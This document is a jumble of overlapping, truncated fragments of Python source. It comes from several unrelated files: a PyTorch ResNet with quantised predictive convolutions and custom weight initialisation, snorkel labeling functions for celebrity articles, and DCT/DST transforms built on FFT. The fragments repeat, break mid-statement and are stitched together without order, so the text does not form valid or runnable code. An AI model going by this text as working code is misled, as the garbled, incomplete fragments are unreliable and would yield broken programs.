init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True", "= threshold SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck,", "= sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10,", "[1] <NAME>, <NAME>, <NAME>, <NAME> Deep Residual Learning for Image", "gain / math.sqrt(2.0 * fan) with torch.no_grad(): new_weight = np.random.laplace(loc=0.0,", "predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride", "self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 =", "None: if init_method == \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain", "float(fan_in + fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std", "def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'): super(ResNet, self).__init__() self.in_planes", "stride=1) self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block,", "== \"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std", "self.in_planes == 16: self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1) self.layer2", "= sign return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10,", "planes, kernel_size=3, stride=stride, padding=1, bias=False) self.conv2 = conv3x3(planes, planes, stride=stride,", "def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False,", "sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True,", "stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) )", "PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True", "stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2) self.layer4 = None", "stride=1): super(Bottleneck, self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)", "def get_non_bop_params(self): non_bop_params = [] for m in self.modules(): if", "= 0 # Tunable PREDICTIVE_BACKWARD = True MSB_BITS = 4", "conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) self.conv2", "input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut = nn.Sequential() if", "self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2) self.linear = nn.Linear(512*block.expansion, num_classes)", "/ math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif", "[] for m in self.modules(): if isinstance(m, nn.Conv2d): bop_params +=", "gain = nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0 * fan)", "[] for stride in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes =", "THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS = msb_bits MSB_BITS_WEIGHT", "= self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2],", "self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None),", "__init__(self, in_planes, planes, stride=1): super(Bottleneck, self).__init__() # self.conv1 = nn.Conv2d(in_planes,", "import numpy as np from models.masked_psg_seed_conv import PredictiveSeedConv2d from masked_layers", "-> None: for m in self.modules(): if isinstance(m, nn.Conv2d): self.reset_parameters(m,", "padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes,", "[3,4,6,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet50( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method) def test(): net = ResNet18() y", "ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method) def PsgSeedResNet152( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4,", "and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,", "from masked_layers import layers # Fixed NUM_BITS = 32 NUM_BITS_WEIGHT", "elif init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain =", "def reset_conv_parameters(self, init_method=\"standard\") -> None: for m in self.modules(): if", "PyTorch. For Pre-activation ResNet, see 'preact_resnet.py'. Reference: [1] <NAME>, <NAME>,", "[] for m in self.modules(): if isinstance(m, (nn.Linear, nn.BatchNorm2d,)): non_bop_params", "out class ResNet(nn.Module): def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'):", "4 MSB_BITS_WEIGHT = 4 MSB_BITS_GRAD = 8 THRESHOLD = 0.0", "= nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1,", "msb_bits_weight MSB_BITS_GRAD = msb_bits_grad THRESHOLD = threshold SPARSIFY = sparsify", "out = self.layer3(out) if self.layer4 is not None: out =", "threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN, writer=WRITER, writer_prefix=writer_prefix) class BasicBlock(nn.Module): expansion = 1", "= nn.init.calculate_gain(\"relu\") scale = gain / math.sqrt(2.0 * fan) with", "MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward MSB_BITS =", "weights reset to {}'.format(init_method)) def reset_parameters(self, module, init_method=\"kaiming_uniform\") -> None:", "an initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None: for m", "/ math.sqrt(fan) with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) * std elif", "\"kaiming_constant_unsigned\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std =", "module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method == \"xavier_constant\":", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [3,3,3],", "conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn3 = nn.BatchNorm2d(self.expansion*planes) self.shortcut", "return non_bop_params def _make_layer(self, block, planes, num_blocks, stride): strides =", "kernel_size=3, stride=1, padding=1, bias=False) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)", "self.layer3(out) if self.layer4 is not None: out = self.layer4(out) #", "= 0.0 SPARSIFY = False SIGN = True def conv1x1(in_planes,", "nn.Sequential( # nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False), conv1x1(in_planes, self.expansion*planes, stride=stride,", "Learning for Image Recognition. arXiv:1512.03385 ''' from numpy.lib.arraysetops import isin", "self.linear(out) return out def PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "elif init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is", "if stride != 1 or in_planes != self.expansion*planes: self.shortcut =", "* fan) with torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data", "= None BIPRECISION = False PREDICTIVE_FORWARD = False WRITER =", "sparsify SIGN = sign return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method)", "forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out =", "= planes * block.expansion return nn.Sequential(*layers) def forward(self, x): out", "\"kaiming_constant_signed\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std =", "out = self.layer1(out) out = self.layer2(out) out = self.layer3(out) if", "NUM_BITS = 32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None BIPRECISION", "torch import torch.nn as nn import torch.nn.functional as F import", "as F import math import numpy as np from models.masked_psg_seed_conv", "8 THRESHOLD = 0.0 SPARSIFY = False SIGN = True", "# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False) self.conv2", "init_method == \"standard\": nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5)) else: raise ValueError(f\"{init_method} is not", "init_method='standard'): super(ResNet, self).__init__() self.in_planes = in_planes self.conv1 = conv3x3(3, self.in_planes,", "planes * block.expansion return nn.Sequential(*layers) def forward(self, x): out =", "num_classes) #self.linear = layers.Linear(512*block.expansion, num_classes) elif self.in_planes == 16: self.layer1", "gain = nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan) with torch.no_grad():", "isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params", "F.avg_pool2d(out, 4) out = F.avg_pool2d(out, out.size()[3]) out = out.view(out.size(0), -1)", "gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) * std", "num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ):", "PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN PREDICTIVE_BACKWARD = predictive_backward", "msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ): global PREDICTIVE_BACKWARD, MSB_BITS,", "self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256,", "num_classes) elif self.in_planes == 16: self.layer1 = self._make_layer(block, 16, num_blocks[0],", "PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True", "self).__init__() self.in_planes = in_planes self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True,", "no padding\" predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes,", "in_planes, planes, stride=1): super(Bottleneck, self).__init__() # self.conv1 = nn.Conv2d(in_planes, planes,", "get_non_bop_params(self): non_bop_params = [] for m in self.modules(): if isinstance(m,", "[2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4,", "module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif init_method == \"xavier_normal\": nn.init.xavier_normal_(module.weight) elif init_method", "/ math.sqrt(2.0 * fan) with torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale,", "out += self.shortcut(x) out = F.relu(out) return out class ResNet(nn.Module):", "sign return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method) def PsgSeedResNet34( num_classes=10, init_method='standard',", "= False PREDICTIVE_FORWARD = False WRITER = None WRITER_PREFIX_COUNTER =", "nn.init.calculate_gain(\"relu\") std = gain / math.sqrt(fan) with torch.no_grad(): module.weight.data =", "= gain / math.sqrt(2.0 * fan) with torch.no_grad(): new_weight =", "for stride in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes", "import PredictiveSeedConv2d from masked_layers import layers # Fixed NUM_BITS =", "256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2) self.linear", "= F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out += self.shortcut(x) out =", "not None: out = self.layer4(out) # out = F.avg_pool2d(out, 4)", "gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std", "out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=\"\"): \"1x1 convolution with no padding\"", "torch.no_grad(): new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape) module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach()) elif", "std = gain / math.sqrt(fan) with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data)", "nn.Conv2d): bop_params += list(m.parameters()) return bop_params def get_non_bop_params(self): non_bop_params =", "= 32 NUM_BITS_WEIGHT = 32 NUM_BITS_GRAD = None BIPRECISION =", "with torch.no_grad(): module.weight.data = torch.ones_like(module.weight.data) * std elif init_method ==", "= self.layer2(out) out = self.layer3(out) if self.layer4 is not None:", "nn import torch.nn.functional as F import math import numpy as", "writer_prefix=None) self.bn1 = nn.BatchNorm2d(planes) # self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,", "init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True ): global", "= nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain = nn.init.calculate_gain(\"relu\") std = gain /", "= module.weight.data.sign() * std elif init_method == \"kaiming_constant_unsigned\": fan =", "if isinstance(m, nn.Conv2d): bop_params += list(m.parameters()) return bop_params def get_non_bop_params(self):", "= nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False) self.conv3 = conv1x1(planes, self.expansion*planes, stride=1,", "fan_out)) with torch.no_grad(): module.weight.data = module.weight.data.sign() * std elif init_method", "F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out += self.shortcut(x) out = F.relu(out)", "initialization option!\") def reset_conv_parameters(self, init_method=\"standard\") -> None: for m in", "x): out = F.relu(self.bn1(self.conv1(x))) out = self.bn2(self.conv2(out)) out += self.shortcut(x)", "return out class Bottleneck(nn.Module): expansion = 4 def __init__(self, in_planes,", "predictive_forward = PREDICTIVE_FORWARD and predictive_forward return PredictiveSeedConv2d( in_planes, out_planes, kernel_size=3,", "stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None) self.bn2 = nn.BatchNorm2d(planes) # self.conv3 =", "'preact_resnet.py'. Reference: [1] <NAME>, <NAME>, <NAME>, <NAME> Deep Residual Learning", "out = F.relu(self.bn2(self.conv2(out))) out = self.bn3(self.conv3(out)) out += self.shortcut(x) out", "nonlinearity=\"relu\") elif init_method == \"kaiming_laplace\": fan = nn.init._calculate_correct_fan(module.weight, \"fan_in\") gain", "MSB_BITS_GRAD = 8 THRESHOLD = 0.0 SPARSIFY = False SIGN", "writer_prefix=None), nn.BatchNorm2d(self.expansion*planes) ) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out", "self.layer2(out) out = self.layer3(out) if self.layer4 is not None: out", "SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes,", "writer_prefix=\"\"): \"1x1 convolution with no padding\" predictive_forward = PREDICTIVE_FORWARD and", "self.bn3(self.conv3(out)) out += self.shortcut(x) out = F.relu(out) return out class", "PsgSeedResNet20( num_classes=10, init_method='standard', predictive_backward=True, msb_bits=4, msb_bits_weight=4, msb_bits_grad=8, threshold=0.0, sparsify=False, sign=True", "# Tunable PREDICTIVE_BACKWARD = True MSB_BITS = 4 MSB_BITS_WEIGHT =", "WRITER_PREFIX_COUNTER = 0 # Tunable PREDICTIVE_BACKWARD = True MSB_BITS =", "= self._make_layer(block, 32, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 64, num_blocks[2],", "out = self.layer2(out) out = self.layer3(out) if self.layer4 is not", "= 1 def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(Bottleneck, [3,4,6,3],", "stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False,", "threshold SPARSIFY = sparsify SIGN = sign return ResNet(BasicBlock, [3,4,6,3],", "1 or in_planes != self.expansion*planes: self.shortcut = nn.Sequential( # nn.Conv2d(in_planes," ]
[ "def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_ ==", "from pyspark.sql import Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark", "if ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\",", "return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base):", "if ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE", "import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0 POSITIVE =", "ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text],", "body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in", "return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\" in", "for ent in x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN", "combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x):", "and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def", "== \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN", "= 1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\")", "\"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function()", "POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\"", "ent in x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN return", "snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import", "labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from", "pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents: if ent.label_ ==", "NEGATIVE = 0 POSITIVE = 1 @preprocessor() def combine_text(x): return", "= -1 NEGATIVE = 0 POSITIVE = 1 @preprocessor() def", "-1 NEGATIVE = 0 POSITIVE = 1 @preprocessor() def combine_text(x):", "ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x,", "return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if", "snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs import", "Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from", "article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents:", "= 0 POSITIVE = 1 @preprocessor() def combine_text(x): return Row(title=x.title,", "celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_ == \"PERSON\" and", "NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for", "== \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()),", "@labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\" in x.body else", "pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents:", "POSITIVE = 1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title}", "from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0", "text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent in", "1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\",", "ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE if \"fortune\" in x.body", "def body_contains_fortune(x): return POSITIVE if \"fortune\" in x.body else ABSTAIN", "person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_ == \"PERSON\"", "ent.text.lower() in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x):", "snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1", "\"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), )", "from snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN =", "spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN", "@preprocessor() def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text])", "@spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents: if ent.label_", "from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs", "ent in x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower() in", "{x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent in x.doc.ents: if", "0 POSITIVE = 1 @preprocessor() def combine_text(x): return Row(title=x.title, body=x.body,", "for ent in x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower()", "drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0 POSITIVE", "import preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE", "return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for", "celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return POSITIVE", "def article_mentions_person(x): for ent in x.doc.ents: if ent.label_ == \"PERSON\":", "Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def article_mentions_person(x): for ent", "@spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent", "import Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function", "x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return", "article_mentions_person(x): for ent in x.doc.ents: if ent.label_ == \"PERSON\": return", "ABSTAIN = -1 NEGATIVE = 0 POSITIVE = 1 @preprocessor()", ") def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if ent.label_", "preprocessor from drybell_lfs import load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE =", "def combine_text(x): return Row(title=x.title, body=x.body, article=f\"{x.title} {x.body}\") @spark_nlp_labeling_function(text_field=\"article\", pre=[combine_text]) def", "ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base: return POSITIVE return", "load_celebrity_knowledge_base ABSTAIN = -1 NEGATIVE = 0 POSITIVE = 1", "import spark_nlp_labeling_function from snorkel.preprocess import preprocessor from drybell_lfs import load_celebrity_knowledge_base", "x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE @spark_nlp_labeling_function(", "pyspark.sql import Row from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import", "from snorkel.labeling.lf import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess", "import labeling_function from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function from snorkel.preprocess import preprocessor", "in celebrity_knowledge_base: return POSITIVE return ABSTAIN @labeling_function() def body_contains_fortune(x): return", "resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def person_in_db(x, celebrity_knowledge_base): for ent in x.doc.ents: if", "in x.doc.ents: if ent.label_ == \"PERSON\" and ent.text.lower() in celebrity_knowledge_base:", "<filename>drybell/drybell_lfs_spark.py from pyspark.sql import Row from snorkel.labeling.lf import labeling_function from", "in x.doc.ents: if ent.label_ == \"PERSON\": return ABSTAIN return NEGATIVE", "return ABSTAIN return NEGATIVE @spark_nlp_labeling_function( text_field=\"article\", pre=[combine_text], resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()), ) def" ]
[ ":(N+1)//2, 0] z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z", "j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M", "..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1 \"\"\" perm =", "x.ndimension() <= 1: x_reorder = x.view([1, N]) else: x_reorder =", "I found add is much faster than sum #y =", "def idct_idxst(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete Cosine-Sine", "than sum #y = y.sum(dim=-1) return y[..., 0]+y[..., 1] def", "signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size()) == 1:", "The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1,", "following array 0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ...,", "products of trigonometric functions to sums. sin(a) sin(b) = 1/2", "introduce a new dimension # Must use IFFT here y", "transformation leveraging fast fourier transform engine. The math here mainly", "signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :] y.mul_(1.0/N) if expk is None:", "batch tensor, the 2D part is MxN @param expk0 with", "expk_1=None): ''' Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization", "torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, sin # I use", "+ v*j/N)) = \\sum_i \\sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N))", "= \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i", "Inverse Discrete Cosine-Cosine Transformation without normalization to coefficients. It computes", "normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return", "y def dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine", "Compute 1D DCT twice. @param x batch tensor, the 2D", "3. Perform IFFT 4. Extract the real part @param x", "return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None):", "y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute", "return y[..., 0]+y[..., 1] def dct_N(x, perm=None, expk=None): \"\"\" Batch", "dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)", "here becomes -2 because complex numbers introduce a new dimension", "import torch import torch.nn.functional as F import pdb \"\"\" Discrete", "cosine tranformation and 1 or sine transformation @param expk 2*exp(j*pi*k/(2N))", "The trigonometric identities exploited by prosthaphaeresis relate products of trigonometric", "= cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype,", "speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder =", "F.pad(x, (0, N), 'constant', 0) # the last dimension here", "x.clone() # switch from row-major to column-major for speedup x_reorder.transpose_(dim0=-2,", "@param expkp1_1 with length N \"\"\" return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2,", "M @param expk1 with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1),", "= \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding trick to", "By mapping the original image from (i, j) to (i,", "= \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick to", "Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients.", "y def idct_N(x, expk=None): N = x.size(-1) if expk is", "1] def idct_2N(x, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation", "@param expkp1_0 with length M @param expkp1_1 with length N", "expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization to coefficients.", "derive various cos/sin transformation by computing FFT twice. \"\"\" def", "device): # Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N))", "tensor for conversion @param cos_or_sin_flag 0 for cosine tranformation and", "the last dimension here becomes -2 because complex numbers 